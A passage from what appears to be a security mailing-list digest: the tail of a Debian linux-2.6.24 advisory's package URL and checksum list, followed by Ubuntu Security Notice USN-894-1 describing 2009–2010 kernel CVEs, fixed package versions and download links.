http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   308138 34dbc7720b1844833f0b71aa307c37fa\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:   310714 6a2c6fbbc1dd000b8a532227e3b8b5ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum:  3939512 91c2ba626e754fe407d6dcf3fa01337a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb\n    Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   259624 ac09dcabb624984b7321a5f6b6dbef54\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83578 e152e18748e5c80b6d06715db836cf83\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   260838 44bc8ad5796c124b53d85a8c3a4ed912\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   262420 ff0641f04c409dd606c34373e8e16269\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:    83546 990eb24056c7f6a63a4d55ec39563bae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:  3446386 6ebfa4544252648df48cfb085cc3d2cc\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb\n    Size/MD5 checksum:   258962 75184bed1f0b42cd8e002f93ed42198a\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:  3656680 c5499cb98cdcdcadc48e3aa5bdf1d379\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   346982 6a6a08f74f9690705e6d770d1f3f2566\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   359548 b10fe011746b0df5fbd2587292af34ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83452 32a1614212e964a4423b161b34cd758d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358212 58ba32b0701643f043ab38a487cae609\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:    83424 c1e8493aff96df5b0fe33f5af4686f98\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb\n    Size/MD5 checksum:   358752 4e3e9ef18a14fd191444591df571f80c\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:  3569470 9ae824064bfc785f4b3512db78119e46\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83432 64a48fa9283b1741e22f0a22dbb93b20\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:    83456 235a5572d5e109a4b575080a8262dc57\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   319938 d7dc0120458e93119879dcdd1e48017e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb\n    Size/MD5 checksum:   320226 34731a37b519d726b133093e04d937c3\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248638 ce9da5c377d6328e9bb9be1c3945fff8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83600 a7b66d71779dea207a3d49cb9f692fdb\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   313302 314b57dc807eb91f617c10b1497e1617\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   314602 2c127076bf189be2836a4c3a4c7736af\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:  3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:    83540 8acdb1b4a4bc57f55b9cc5b2b04043a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   229412 0b93c7c909eca04fad4fa45e3e73e96c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   248700 13266a2acd5fcbd75d11049dd5e5ad58\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb\n    Size/MD5 checksum:   218314 4174dec1c73ca114469cbb88fba32926\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   309868 d69b27ef946f2ac62b115e0200fe8002\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248150 7c585f74e0752a631050b13b9740c0c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83484 a678208f18017a9c87d45548916fd98e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   311392 5b1f0957a2756b04be6c95ae8ca5e2c8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   247968 929ca712a0aa0984f9dc2a6f68f405a5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:  3805532 be10a8b64da3adf7ece3846b0b0bf930\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:    83434 ac0cb9b5939e4ea82c3c83a1a1d473ed\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb\n    Size/MD5 checksum:   248174 50e84058a7d710f013f92e1fe68a705c\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322474 2d7e39cf0b78d98125a0baba377f1af0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   324008 3b021bb4b3dac72dc68e701f4a209939\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   295928 ca2bf1c3c12f409e469c516877a8e91c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:   322502 4b76cce255e1fcc72cb82053cd34a1a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83466 a041c0fdb383832cf725723ce22e40c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:    83430 392d415932625b1a69dc6494d2f737e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum:  3674486 200fdcca2140a97f961a37d70db620d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb\n    Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83532 a1c34683fe304f1a86bbc28f6cbc654c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:    83556 bf7fed1ef4da92d782409fe8345f861a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  6976486 5b5db16fea4336068bbcd5bff56ad575\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  7228452 75c044fa17d6071de36579a1491c2e1b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  3431908 18825f85900faca81b21e48d43af6ee7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   197006 0a44248e77ec1ff027edd032ebe5b2c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:  1503494 bd7f7b7bd4e120472bf60ad0b7d9184e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb\n    Size/MD5 checksum:   196810 f03114c2f256a97b15f88d2659f9501b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83428 1ea7179752fbb45e10e731991583db68\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   263546 ef894d6917cbe692ec9197048538d5e7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:  3651402 a0194c650712040f81e97d5b3b62bc79\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:   264892 0b642e20f00b52c20b6ae9e0ee1f78b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum:    83442 6d109d7f131dab564736e2ac6a85dd29\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb\n    Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7\n\n  These changes will probably be included in the oldstable distribution on\n  its next update. ===========================================================\nUbuntu Security Notice USN-894-1          February 05, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138,\nCVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538,\nCVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\nUbuntu 9.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-55-386       2.6.15-55.82\n  linux-image-2.6.15-55-686       2.6.15-55.82\n  linux-image-2.6.15-55-amd64-generic  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-k8  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-server  2.6.15-55.82\n  linux-image-2.6.15-55-amd64-xeon  2.6.15-55.82\n  linux-image-2.6.15-55-hppa32    2.6.15-55.82\n  linux-image-2.6.15-55-hppa32-smp  2.6.15-55.82\n  linux-image-2.6.15-55-hppa64    2.6.15-55.82\n  linux-image-2.6.15-55-hppa64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-itanium   2.6.15-55.82\n  linux-image-2.6.15-55-itanium-smp  2.6.15-55.82\n  linux-image-2.6.15-55-k7        2.6.15-55.82\n  linux-image-2.6.15-55-mckinley  2.6.15-55.82\n  linux-image-2.6.15-55-mckinley-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc   2.6.15-55.82\n  linux-image-2.6.15-55-powerpc-smp  2.6.15-55.82\n  linux-image-2.6.15-55-powerpc64-smp  2.6.15-55.82\n  linux-image-2.6.15-55-server    2.6.15-55.82\n  linux-image-2.6.15-55-server-bigiron  2.6.15-55.82\n  linux-image-2.6.15-55-sparc64   2.6.15-55.82\n  linux-image-2.6.15-55-sparc64-smp  2.6.15-55.82\n\nUbuntu 8.04 LTS:\n  linux-image-2.6.24-27-386       2.6.24-27.65\n  linux-image-2.6.24-27-generic   2.6.24-27.65\n  linux-image-2.6.24-27-hppa32    2.6.24-27.65\n  linux-image-2.6.24-27-hppa64    2.6.24-27.65\n  linux-image-2.6.24-27-itanium   2.6.24-27.65\n  linux-image-2.6.24-27-lpia      2.6.24-27.65\n  linux-image-2.6.24-27-lpiacompat  2.6.24-27.65\n  linux-image-2.6.24-27-mckinley  2.6.24-27.65\n  linux-image-2.6.24-27-openvz    2.6.24-27.65\n  linux-image-2.6.24-27-powerpc   2.6.24-27.65\n  linux-image-2.6.24-27-powerpc-smp  2.6.24-27.65\n  linux-image-2.6.24-27-powerpc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-rt        2.6.24-27.65\n  linux-image-2.6.24-27-server    2.6.24-27.65\n  linux-image-2.6.24-27-sparc64   2.6.24-27.65\n  linux-image-2.6.24-27-sparc64-smp  2.6.24-27.65\n  linux-image-2.6.24-27-virtual   2.6.24-27.65\n  linux-image-2.6.24-27-xen       2.6.24-27.65\n\nUbuntu 8.10:\n  linux-image-2.6.27-17-generic   2.6.27-17.45\n  linux-image-2.6.27-17-server    2.6.27-17.45\n  linux-image-2.6.27-17-virtual   2.6.27-17.45\n\nUbuntu 9.04:\n  linux-image-2.6.28-18-generic   2.6.28-18.59\n  linux-image-2.6.28-18-imx51     2.6.28-18.59\n  linux-image-2.6.28-18-iop32x    2.6.28-18.59\n  linux-image-2.6.28-18-ixp4xx    2.6.28-18.59\n  linux-image-2.6.28-18-lpia      2.6.28-18.59\n  linux-image-2.6.28-18-server    2.6.28-18.59\n  linux-image-2.6.28-18-versatile  2.6.28-18.59\n  linux-image-2.6.28-18-virtual   2.6.28-18.59\n\nUbuntu 9.10:\n  kernel-image-2.6.31-108-imx51-di  2.6.31-108.21\n  linux-image-2.6.31-19-386       2.6.31-19.56\n  linux-image-2.6.31-19-generic   2.6.31-19.56\n  linux-image-2.6.31-19-generic-pae  2.6.31-19.56\n  linux-image-2.6.31-19-ia64      2.6.31-19.56\n  linux-image-2.6.31-19-lpia      2.6.31-19.56\n  linux-image-2.6.31-19-powerpc   2.6.31-19.56\n  linux-image-2.6.31-19-powerpc-smp  2.6.31-19.56\n  linux-image-2.6.31-19-powerpc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-server    2.6.31-19.56\n  linux-image-2.6.31-19-sparc64   2.6.31-19.56\n  linux-image-2.6.31-19-sparc64-smp  2.6.31-19.56\n  linux-image-2.6.31-19-virtual   2.6.31-19.56\n  linux-image-2.6.31-211-dove     2.6.31-211.22\n  linux-image-2.6.31-211-dove-z0  2.6.31-211.22\n  linux-image-2.6.31-304-ec2      2.6.31-304.10\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06)\nthe kernel updates have been given a new version number, which requires\nyou to recompile and reinstall all third party kernel modules you\nmight have installed. Unless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-server, linux-powerpc), a standard system\nupgrade will automatically perform this as well. \n\nDetails follow:\n\nAmerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\nfilesystems did not correctly check certain disk structures.  Ubuntu 9.10 was not\naffected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest\ninstructions.  A local attacker in a guest could exploit this to\ntrigger high scheduling latency in the host, leading to a denial of\nservice.  Ubuntu 6.06 was not affected.  Ubuntu 6.06 was not\naffected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle\nO_ASYNC on locked files.  Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e\nnetwork drivers did not correctly check the size of Ethernet frames. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that \"print-fatal-signals\" reporting could show\narbitrary kernel memory contents.  A local attacker could exploit\nthis, leading to a loss of privacy. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\nhandle jumbo frames.  Only Ubuntu 9.04 and 9.10 were\naffected.  A local attacker could disrupt network\ntraffic, leading to a denial of service. (CVE-2010-0291)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz\n      Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc\n      Size/MD5:     2921 682576890de917043eccf6fc9398aed2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb\n      Size/MD5:    96386 b184441d2f44037554d037d217688393\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    44768 